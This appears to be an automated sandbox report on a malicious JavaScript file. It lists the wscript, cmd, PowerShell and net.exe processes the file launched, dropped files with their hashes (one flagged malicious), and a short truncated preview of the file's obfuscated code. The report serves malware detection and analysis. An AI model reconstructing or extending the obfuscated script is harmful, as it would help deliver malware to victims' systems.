C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.282705607724759 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJfbPtdPeUkwRe9:YvXKXFJUO0cyYGDV8Ukee9 |
MD5: | 17B217C3F793A6AB25492CD74999A52B |
SHA1: | 078C548A91A9864FA47E8C1A53EAFF0ED2B4CB1E |
SHA-256: | 76F48CC6C8A2DDF01088AF832B6641437C14B0BA1F0EC4438B794C118296761A |
SHA-512: | 563C972D18C7FE4708B3515C93F25E29B46092D093E27914841276D9BA31971E83DAE1B3FB0D9DF00AEA07C63D3490720BB023219E4229F0D1ACCE5A3D0BBC3B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.286075199955421 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJf21rPeUkwRe9:YvXKXFJUO0cyYG+16Ukee9 |
MD5: | 9399E783AE44A91973FA9EEA806E0A07 |
SHA1: | B6DFCF57406E4F22FAF68CC01FE5A104B9797211 |
SHA-256: | 2CFC7471E262625F06F9AC5F967D1D6F07ABDEB3B3F6E07F7D8487C34B124CAA |
SHA-512: | 7E9962EF2E2EEE68402E9CE45B257B83BF9EF89E508E9B15A95E273319F90F8B0B71F8CB8AB7F051A382EC257CF585E076BE1306AC0410527FB6406F17D2B05A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.66822327051005 |
Encrypted: | false |
SSDEEP: | 24:Yv6XDZZQamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSf:Yv8WBgkDMUJUAh8cvMf |
MD5: | FCE0DA10CB931E52F46C57BA457222D9 |
SHA1: | 961DE83BEEC5A0FCC2A98CA0109E25A9372BF3A4 |
SHA-256: | 9C33AF96B90CF17A516220D5D5829EFB3D4BF803D155A76971E55E6C7F6E9BB0 |
SHA-512: | 80B45794D1A270801551147A4672F21C9839B38B9CC7E91EE79284E8816B580806DE4D5FF248846168166415F47B34153EC0878A8D4DA5518A1A59A805CDAAB9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.262686794896771 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJfshHHrPeUkwRe9:YvXKXFJUO0cyYGUUUkee9 |
MD5: | E8E3A1A45A7BAFFF0496DED7B459E730 |
SHA1: | BC5342CFE175FFA0A9B84D1874F3FB188B5AD412 |
SHA-256: | C2947D232EC04BA6931C3054CD5BF699EFE6295B4641A004E08BEE44CA33C8D8 |
SHA-512: | 5211C26B5A8FDC0CEA9F0E849853DD39350C8B8C372CB980F047DEAC37C878BEAEB9DDFCC08396F841A124E42FB26D67E2AB4AF617361807E98FEF5F03C3B9A5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.263414691961607 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJTqgFCrPeUkwRe9:YvXKXFJUO0cyYGTq16Ukee9 |
MD5: | 6715BC044FEBE778B0707222C9A832F3 |
SHA1: | 14BE6BA1D17B4EC0522771A0D765A04521D8BD0E |
SHA-256: | 9FDE89D2FED440F6D50542043926321D440DEE71E590D510B92E2868BA04C908 |
SHA-512: | 6D3D54ECE97D95B6C1F5FDAE30F58A5B40BD902A9E9FB368AC77024276EA5814A66EFBB0CBB35E30E0263F8AA0C32CCF85D09CE35C06855491B2E2F31F993A75 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.148079610062408 |
Encrypted: | false |
SSDEEP: | 24:YlJ9TabSay5ufiWfPftHDtpBc1jOhj0SLFBiwv2qJi2LS1CZ3gVTPX095ab9xuEZ:Yb4iOyOlLiy/izGg56ob9x |
MD5: | 0F209D591A9EA4C673AB39278B2B3795 |
SHA1: | A4D8B7948EACAFECD5D217E7379705E40FE21283 |
SHA-256: | 1564A420ECC5E6D7E86D091918CF57DADC8D0BC25D16AE3F386DA8B6F6C19C90 |
SHA-512: | 30A23BFAB7BE4A2B83228BA062F16B625C1AB9487EC061B8957EDD6532A2135C3127D595022AB239FD97611D17D8B7A63768A8E66FAC46E7EBB181AE58AC45BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1460988266742704 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursDEPRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudA:TFl2GL7msDeXc+XcGNFlRYIX2v3kWA |
MD5: | BDC8FEAE439AACD9EDDBD47A38051408 |
SHA1: | 31C805633B762647A9129A2236B6DFEBD39F3D80 |
SHA-256: | 8644AC213E166596620E6B4774E06A078B2BC8990EAD3CBC057638A16A864C3B |
SHA-512: | AA2E599464E8F03030F79DABDD8110CB019D9AC1E7B606DDF7130C2657B6101F1A763D926AFBDCFE679B70FCA559895AB87EFBC23F6BA794E3850636D4CD570E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.550926279910346 |
Encrypted: | false |
SSDEEP: | 24:7+t5MjEPUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxzXqLxxo:7MsBXc+XcGNFlRYIX2v6qVl2GL7msa |
MD5: | 9D433305B1913286B897534CACF4A9C0 |
SHA1: | E3B38823BB14DF8DDFCDBCC813BAF6B600C7B221 |
SHA-256: | 23249462C866FBBE5F554E9A14ED7353C7AFC308645F8B1CD967519416A9D6DB |
SHA-512: | EE9F94399663C5F9CAAC32C2BF27AA1F5B0634F74A554A65AAE8692D54D0D49C96EC0FE587D7E31D2AEF96B8C2A1C19BE0EE01CEAC50A08A37B0AF4600875571 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEg4X6pyPjghmveCaMkmQLlFABmw+Yyu:6a6TZ44ADE4X7ghWe9mcOsnK |
MD5: | 43C47D43BB5A67A9DA47AC1F83429306 |
SHA1: | 31AA8DF0C322B997A2187E852E99FCC76F8F06E1 |
SHA-256: | FBC4068971D4F361F5FD4ADB2339A719D1EC34C7F02B9D90AEF9B9C73F3ACA66 |
SHA-512: | 3879ADAA7433500B77CF01F9BC115811F5B4AEE06BA4ADF4072CA021488398BE664401E264A8F371C899A8FB343F35EC070C674FB93C7AE2B90DCCB88320E993 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul/nq/llh:NllUyt |
MD5: | AB80AD9A08E5B16132325DF5584B2CBE |
SHA1: | F7411B7A5826EE6B139EBF40A7BEE999320EF923 |
SHA-256: | 5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4 |
SHA-512: | 9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.518261198325562 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEKI:Qw946cPbiOxDlbYnuRK+bDKI |
MD5: | FC8896FC5A5DB2247584BC565EF9F113 |
SHA1: | B2A3B8F016CE462094BA5E530C8C7A3A759B7188 |
SHA-256: | 7176AF7BC4CA105A23767801B334182A990ACF590958AC34066DD6A45CAD1CAB |
SHA-512: | 2CB09E7BF9CCCCE925DBBBE78266F1F2BEFB3C17452FC63B17840A8F381953E52CDFD3AC0D4103394889C52C1464DC1AAF30BCC3E17FEA115723DA4BEE2A0327 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 17-58-30-511.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.36306020694243 |
Encrypted: | false |
SSDEEP: | 384:JXR2pbG7hentCuVGYya38YpM43q/KjHtqdqm40YqKvoqUjxCgBYSwVwRsHNqGLj4:fnb |
MD5: | EA57E3F82E3D685CAEB84890109E7D12 |
SHA1: | 156D3888FBA596AC123DC9012AF64F7A7B5910A7 |
SHA-256: | 7F5AF61528264432B3EEB5438E330A3504508B1136A7ADA63B526F9CD5617D12 |
SHA-512: | B2F8F4EFE362EEFB9E7986E56FC9FC6A2CEC2C9A85BE26576440267AC3CB16D44FFB4D9AE6C45904873CBCE173383080D1D8C13F01CAC6F539B7CD19F8518871 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.394508350463421 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbCocbfWICmcbp:V3fOCIdJDeEx/Ct |
MD5: | FDE9D31151A03B8D1C51495EE698F159 |
SHA1: | 0066D30491F1412570E045E0EE5011D232BBDB5D |
SHA-256: | 43F3CCA63411D1677E070E1D516987AA6B5BE674E51D55CD989BB000EA056922 |
SHA-512: | B60CFB61BE2075513C04463FD214B0A9763B87A9920F25F78E5ECB716062FFFAD378A0FF2C073E93FFFD29422EA6DBFFBDA7CEFEBE7852234D7E6FCFE98EB413 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xaWL07oSwYIGNPUGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JaWLxSwZG6GZn3mlind9i4ufFXpAXkru |
MD5: | C267C8C3D4A0DBACC06F3737E1784EB3 |
SHA1: | D798A10176D979377257977E896C8D332B785F23 |
SHA-256: | B5B5EF233AADF8F9C3509CDE98C7A9885D0E1B4938CD2A0676170BC8B30855F4 |
SHA-512: | 3C9CC6700F7827321C0DEADA8F8517F8BAAB6056AF3D7FDAA71BF258C58399EDFDA8601AEBAEEBAB36EF0B1F59BA3E9690EEC2ACD2B8E3A94C8A328261D55D16 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.94335213859511 |
TrID: | |
File name: | 11804174121566513871.js |
File size: | 17'428 bytes |
MD5: | 0ccfce8a8ccc13acff0096a30040a6ef |
SHA1: | 866cc139da62e72634483fcf41af517311654ddb |
SHA256: | f7d714df158b2781eb642bc21ea0c4e68e3c93643aef8992694d5107041133a8 |
SHA512: | be7417a40618abe903bc2ba507d72006e39a956091c9ccadf065a53ec33b47fed5c4f6df584a8cb1cd5655577efc33a0603d3f2baf88a17190881c71580e26a4 |
SSDEEP: | 384:z2/uf/OzT/ZYhQSFFqFFbW5cVYu4l8eej4APgZGZna3FyTX05dpevHHZm7cXlvbs:z2/uf/O//Z6QSFFqFFiOVYu4l8eej4AG |
TLSH: | E072528C9715FEB68DEC41D125C525DEB880620ECEE029EDC69210F81EABB7445ED2FD |
File Content Preview: | function ddnps(){fqempa=[1031,3079,5127,4103,2055,3072];var ehqqpezt=this[yhvtdik+axmuwvv+bzehobo+gsqumyovh+dxpxud+sfyvhdcgb+crrgeolo+oemawc](this[kbweqltoz+mcmtvmp+dgjgokzqp+bzehobo+dsiiwj+yhvtdik+oemawc][ncajoq+bzehobo+dxpxud+axmuwvv+oemawc+dxpxud+cshil |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 17:58:21 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff68f140000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 17:58:22 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78c030000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 17:58:22 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 17:58:22 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 17:58:27 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 17:58:27 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78c030000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 17:58:27 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff65d890000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 17:58:27 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 17:58:28 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 17:58:28 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function ddnps() { |
|
1 | fqempa = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
